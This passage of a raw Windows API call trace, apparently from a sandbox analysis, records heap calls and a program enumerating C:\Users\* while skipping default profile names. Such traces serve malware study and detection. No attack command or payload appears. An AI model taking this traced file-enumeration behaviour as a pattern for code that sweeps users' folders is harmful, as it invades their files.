lpMsg=0x87f544) returned 0 [0157.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18e0 [0157.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0157.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0157.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0157.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default|Defaultuser|Defaultuser0|Default User", cchCount1=45, lpString2="*", cchCount2=1) returned 3 [0157.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0157.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0157.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0157.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18d0 [0157.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0157.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0157.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default|Defaultuser|Defaultuser0|Default User", cchCount1=45, lpString2="", cchCount2=0) returned 3 [0157.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0157.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18d0 | out: hHeap=0x8a0000) returned 1 [0157.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0157.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0157.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0157.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0157.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x91d5a8 [0157.039] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18e0 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf348 [0157.040] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0157.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf348 | out: hHeap=0x8a0000) returned 1 [0157.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de948 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18e0 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de998 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1900 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18d0 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0157.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18d0 | out: hHeap=0x8a0000) returned 1 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18d0 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18a0 [0157.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b80 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9c0 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba630 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18a0 [0157.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba630 | out: hHeap=0x8a0000) returned 1 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0157.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0157.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba630 [0157.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0157.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba438 [0157.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba090 [0157.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0157.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0157.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0157.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0157.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0157.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0157.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea60 [0157.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba648 [0157.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0157.042] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0157.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0157.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a90 | out: hHeap=0x8a0000) returned 1 [0157.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0157.043] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x87ed38 | out: lpFindFileData=0x87ed38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e7398, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x91d5e8 [0157.043] FindNextFileW (in: hFindFile=0x91d5e8, lpFindFileData=0x87ed38 | out: lpFindFileData=0x87ed38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e7398, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.043] FindNextFileW (in: hFindFile=0x91d5e8, lpFindFileData=0x87ed38 | out: lpFindFileData=0x87ed38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e7398, dwReserved1=0x8a7560, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0157.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0157.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb00 | out: hHeap=0x8a0000) returned 1 [0157.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0157.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0157.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0157.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0157.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0157.043] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0157.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0157.043] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0157.043] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0157.044] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9091f8 | out: hHeap=0x8a0000) returned 1 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0157.044] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9091f8 | out: hHeap=0x8a0000) returned 1 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0157.044] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0157.044] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9091f8 | out: hHeap=0x8a0000) returned 1 [0157.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ae0 | out: hHeap=0x8a0000) returned 1 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90bd40 | out: hHeap=0x8a0000) returned 1 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0157.045] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0157.045] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0157.045] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0157.045] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.045] FindNextFileW (in: hFindFile=0x91d5e8, lpFindFileData=0x87ed20 | out: lpFindFileData=0x87ed20*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x8a7560, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb00 | out: hHeap=0x8a0000) returned 1 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0157.045] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9091f8 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.046] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9091f8 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.046] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.046] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb00 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9091f8 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923970 | out: hHeap=0x8a0000) returned 1 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9239c8 | out: hHeap=0x8a0000) returned 1 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ae0 | out: hHeap=0x8a0000) returned 1 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0157.047] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0157.047] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0157.047] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ae0 | out: hHeap=0x8a0000) returned 1 [0157.047] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.047] FindNextFileW (in: hFindFile=0x91d5e8, lpFindFileData=0x87ed20 | out: lpFindFileData=0x87ed20*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Default", cAlternateFileName="")) returned 1 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb00 | out: hHeap=0x8a0000) returned 1 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ae0 | out: hHeap=0x8a0000) returned 1 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0157.047] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9091f8 | out: hHeap=0x8a0000) returned 1 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ae0 | out: hHeap=0x8a0000) returned 1 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.047] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9091f8 | out: hHeap=0x8a0000) returned 1 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ae0 | out: hHeap=0x8a0000) returned 1 [0157.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.048] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ae0 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ae0 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, 